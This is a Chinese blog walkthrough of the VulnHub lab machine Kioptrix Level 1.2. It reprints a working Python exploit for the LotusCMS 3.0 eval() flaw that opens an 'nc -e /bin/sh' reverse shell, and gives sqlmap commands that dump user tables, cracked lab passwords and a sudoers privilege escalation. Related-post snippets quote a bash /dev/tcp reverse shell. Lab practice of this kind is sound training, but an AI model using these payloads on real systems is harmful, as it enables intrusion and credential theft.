Kioptrix : Level 1.2

已于 2024-07-31 09:10:31 修改
阅读量638 收藏 12
点赞数 14
文章标签: 安全
于 2024-07-31 08:01:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53626662/article/details/140812476
版权

一、主机发现

二、信息收集

1.访问首页

将域名与ip做绑定

访问,发现有id参数

2.目录扫描

1)/modules

2)/phpmyadmin

3)发现cms

4)首页的登陆页面

三、利用

1.到kali找历史漏洞

searchsploit lotusCMS

发现有3.0版本漏洞,下载 lotusCMS payload

#!/usr/bin/python3
import argparse
import subprocess
import sys, re
import requests

banner ="""
        /***
        *      _        _              ___ __  __ ___  
        *     | |   ___| |_ _  _ ___  / __|  \/  / __| 
        *     | |__/ _ \  _| || (_-< | (__| |\/| \__ \ 
        *     |____\___/\__|\_,_/__/  \___|_|  |_|___/ 
        *
        *     Exploit eval() Remote Command Execution
        *                                                   
        ***/
        """


def get_local_ip():
    output = subprocess.check_output(["ifconfig","eth0"]).decode("utf-8")
    ip_pattern = r"inet (?P<ip>((\d*).){4})"
    result = re.search(ip_pattern,output)
    return result.group("ip").rstrip()


def check_param(ssl, rh, rp, uri):
    if ssl:
        url = f"https://{rh}:{rp}{uri}index.php?page=index"
    else:
        url = f"http://{rh}:{rp}{uri}index.php?page=index"
    req = requests.get(url)
    return req.status_code


def check_vuln(ssl, rh, rp, uri):
    if ssl:
        url = f"https://{rh}:{rp}{uri}index.php?page=index%27%29%3B%24%7Bprint%28%27RCEVulnerable%27%29%7D%3B%23"
    else:
        url = f"http://{rh}:{rp}{uri}index.php?page=index%27%29%3B%24%7Bprint%28%27RCEVulnerable%27%29%7D%3B%23"
    req = requests.get(url)
    content = req.content
    result = str(content).find("RCEVulnerable")
    return result


def exploit(ssl, rh, rp, uri, lh, lp):
    if ssl:
        url = f"https://{rh}:{rp}{uri}index.php?page=index%27%29%3B%24%7Bsystem%28%27nc%20-e%20%2fbin%2fsh%20{lh}%20{lp}%27%29%7D%3B%23%22"
    else:
        url = f"http://{rh}:{rp}{uri}index.php?page=index%27%29%3B%24%7Bsystem%28%27nc%20-e%20%2fbin%2fsh%20{lh}%20{lp}%27%29%7D%3B%23%22"
    req = requests.get(url)


def main():
    parser = argparse.ArgumentParser(prog="lotuscms",
                                     description="Tool to exploit LotusCMS 3.0 eval() RCE vulnerable.")
    parser.add_argument("-rh", metavar="RHOST", required=True, help="Target Host.")
    parser.add_argument("-rp", metavar="RPORT", default="80", help="Target Port. Default: 80")
    parser.add_argument("-u", metavar="URI", default="/", help="URI (i.e /lms/. Default: /")
    parser.add_argument("-lh", metavar="LHOST", help="Local Host.")
    parser.add_argument("-lp", metavar="LPORT", default="444", help="Local Port. Default: 444")
    parser.add_argument("-s", action="store_true", help="SSL/TLS enable (True/False). Default: False")

    if len(sys.argv) < 1:
        parser.print_help()
        parser.exit(1)
    
    args=parser.parse_args()
    if args.lh is None:
        args.lh = get_local_ip()

    print(banner)

    print("[*] Checking page param: /index.php?page=index ...")
    vuln_exist = check_param(args.s, args.rh, args.rp, args.u)
    if vuln_exist != 200:
        print("==> page param not found.")
    else:
        print("==> page param found.")
        print("[*] Checking if page is vulnerable to RCE ...")
        if check_vuln(args.s, args.rh, args.rp, args.u) == -1:
            print("==> page is not vulnerable.")
        else:
            print("==> page is vulnerable.")
            print("[*] Exploiting ...")
            try:
                while True:
                    exploit(args.s, args.rh, args.rp, args.u, args.lh, args.lp)
            except KeyboardInterrupt:
                print("User interrupted.")
            except Exception as err:
                print(err)
            finally:
                print("Bye bye.")
                sys.exit(1)

if __name__ == "__main__":
    main()

写入

执行

kali监听,监听成功

获得交互式shell命令

python -c 'import pty; pty.spawn("/bin/bash")'

2.sql注入

sqlmap -u "http://192.168.59.129/gallery/gallery.php?id=1" --batch --dbs			# 查询数据库名
sqlmap -u "http://192.168.59.129/gallery/gallery.php?id=1" --batch -D gallery --tables			# 查询gallery库下数据表
sqlmap -u "http://192.168.59.129/gallery/gallery.php?id=1" --batch -D gallery -T gallarific_users --dump		查询 user 表下用户
sqlmap -u "http://192.168.59.129/gallery/gallery.php?id=1" --batch -D gallery -T dev_accounts --dump
 
# admin:n0t7t1k4
# dreg:0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)
# loneferret:5badcaf789d3d1d09794d8f021f40f0e (starwars)

1)将收集到的url参数放到sqlmap中跑

存在老多了,随便拎出来吊打

2)查询数据库名

3)查询数据库下的表

4)查看表下字段user和accounts

5)尝试使用ssh链接

显示需要凭证,输入

四、提权

1.查看内核版本信息

uname -a

2.查看靶机发行版本信息

cat /etc/*-release

3.查看/etc/passwd,有利用漏洞

4.查看家目录

查看readme文件

5.直接执行 sudo ht不行,看看可以执行什么

上网找下原因

盗图

执行

6.再次执行sudo ht,启动成功

F3查找 /etc/sudoers 然后在loneferrt后加,/bin/bash

F2保存

F10退出

7.执行 sudo /bin/bash

成功提权

蓝天模糊
关注
vulnhub靶场/Kioptrix Level-1.2
qq_45230030的博客
04-18 519
基本是按下载地址中的顺序打的,第二个下载地址:GitHub - rishabhkant07/Privilege-Escalation-Cheatsheet-Vulnhub-: This is a Cheatsheet for CTF Challenges categorized by different Privilege Escalation Methods其中也附有相应的WP,也是有很多种方法,怎么方便怎么来吧。下载完靶机,更改网络为NAT模式,与攻击机设置为同一网卡模式。
Vulnhub靶机:Kioptrix_Level1.2
qq_48904485的博客
03-14 600
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机:Kioptrix_Level1.2192.168.56.106)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-12-3,24/
KIOPTRIX: LEVEL 1.2 (#3)
Katarina__的博客
09-04 708
KIOPTRIX: LEVEL 1.2 (#3) 攻击机IP:192.168.253.143 靶机IP:192.168.253.144 一、信息收集 1、确定目标主机IP、开放端口 使用netdiscover确定网段内目标主机。 netdiscover -i eth0 -r 192.168.253.0/24 (主动探测网段内活动主机) 也可使用nmap扫固定网段 nmap -sP 192.168.253.0/24 找到ip后,可继续使用nmap探测此主机的开放端口等信息 nmap -n -
KIOPTRIX: LEVEL 1.2-VulnHub靶机学习第四篇
qq_27466929的博客
09-04 1164
VulnHub靶机学习第二篇:KIOPTRIX: LEVEL 1.2
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
汗的博客
04-01 907
这次的靶机是Vulnhub靶机: 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 靶机设置 老规矩,开启虚拟机前分配一个和攻击机一样的网卡,选择我已移动该虚拟机;开启虚拟机后,netdiscover确认一下目标,我的靶机ip为 利用知识及工具 信息收集并getshell 提权 总结 ...
VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2
LYJ20010728的博客
08-09 1426
VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2环境下载KIOPTRIX: LEVEL 1靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 KIOPTRIX: LEVEL 1靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l 得到目标靶机的IP为:192.168.246.135 用Nmap探测一下目标靶机IP的端口
Kioptrix Level-1.2靶机
2401_84564260的博客
07-30 510
下面是 /etc/sudoers 文件的一个片段。编辑文件,以便我们可以无限制地使用 sudo。需要先在C:\windows\system32\drivers\etc\hosts映射ip。更改为 loneferret ALL=(ALL) NOPASSWD: ALL。发现url中可能存在sql注入 使用sqlmap进行测试。查看 CompanyPolicy.README文件。输入 ls 得到congrats.txt文件。使用 ls 查看更多信息 发现两个文件。检查一下sudo文件的内容。
【vulnhub靶场】Kioptrix : Level 1.2靶机提权
qq_46421742的博客
07-26 413
免责声明:本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。
vulnhub- Kioptrix: Level 1.2 (#3) (考点 :lotusCMS/phpadmin/ssh/ht/linux知识/linux提权)
冬萍子癸水
04-20 1038
arp-scan -l 多出来的那个机子就是 nmap。很常规,22要想到可能有ssh登录,80就是进网页找信息 C:\root\Desktop> nmap -A 192.168.189.162 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-19 21:06 EDT Nmap scan report for 192.168.189.16...
Kioptrix : Level 1.2靶机详解
a666666688的博客
09-19 326
直接访问80的web端口,点击HOME,发现url有点可疑,存在page传参,同时发现内容中有gallery CMS的关键字。我们尝试在最后一行追加loneferret ALL=(ALL)NOPASSWD:ALL,就可以修改为root权限了。开启交互式shell,配置环境变量,进入文件查看sql信息,看能不能找到账户,密码。扫描出来的信息,先插眼,后面看能不能找到账户密码。使用hackar验证漏洞,证明存在漏洞。kali和靶机都配置为nat模式。登录phpmyadmin。加上之后ctrl+c退出。
vulnhub-KIOPTRIX: LEVEL 1.2 (#3)-KioptrixVM3靶场
shulao2010的博客
05-23 487
一个单机靶场,讲解了如何通过简单web漏洞获得主机root权限
红队打靶:KIOPTRIX1.2打靶思路详解(vulnhub)
Bossfrank的博客
07-19 1591
本文是vulnhub靶机KIOPTRIX1.2的详细打靶过程。涉及到的知识点包括cms漏洞利用、敏感信息搜索、john破解密码哈希、sudoers文件提权等。CMS漏洞利用获得反弹shell是关键。敏感信息搜索需要有耐心。
Kioptrix: Level 1.1 (#2)
战神/calmness的博客
06-04 1123
下载地址:https://www.vulnhub.com/entry/kioptrix-level-11-2,23/ 目标机器:192.168.243.147 攻击机器:192.168.210.134 目录 信息收集 万能和密码破解 命令执行 反弹shell 监听 提权 版本内核 linux 2.6.9 信息收集 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 3.9p1 (proto...
oscp——Kioptrix: Level 1.1 (#2)
王嘟嘟的博客
02-20 1303
0x00 前言 第三十二台机子 0x01 信息收集 0x02 Web80-webshell 访问页面之后发现是一个登录页面,这种页面看起来就像是一个SQL注入,试一下万能密码 成功进入后台,可以看到是一个执行ping命令的执行窗口 这里反弹一下shell,这里使用 bash -i >& /dev/tcp/192.168.0.111/1234 >&1 然后在/...
vulhub - Kioptrix: Level 1.1 (#2) writeup
Jiajiajiang_的博客
12-12 831
主机来源:www.vulnhub.com 下载地址:https://download.vulnhub.com/kioptrix/Kioptrix_Level_2-update.rar 发现IP 安装成功后,查找此虚拟机的IP,我使用的是netdiscover netdiscover -i eth0 -r 172.21.137.0/24 找到IP为:172.21.137.47 端口...
Vulnhub-靶机-Kioptrix: Level 1.2 (#3)
qq_43264813的博客
01-28 910
Vulnhub—靶机—Kioptrix: Level 1.2 (#3) 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ 文章目录Vulnhub—靶机—Kioptrix: Level 1.2 (#3)一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址: 【命令】nmap -n -sC -s
芯片软错误概率探究:基于汽车芯片安全设计视角
最新发布
ANSILIC的博客
04-30 1132
本文深入剖析了芯片软错误概率问题,结合 AEC-Q100 与 IEC61508 标准,以 130 纳米工艺 1Mbit RAM 芯片为例阐述其软错误概率,探讨汽车芯片安全等级划分及软错误对汽车关键系统的影响,分析先进工艺下软错误变化趋势,并提出相应的应对策略,旨在为芯片在汽车等安全关键领域的应用提供理论参考与实践指导,保障电子系统可靠性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值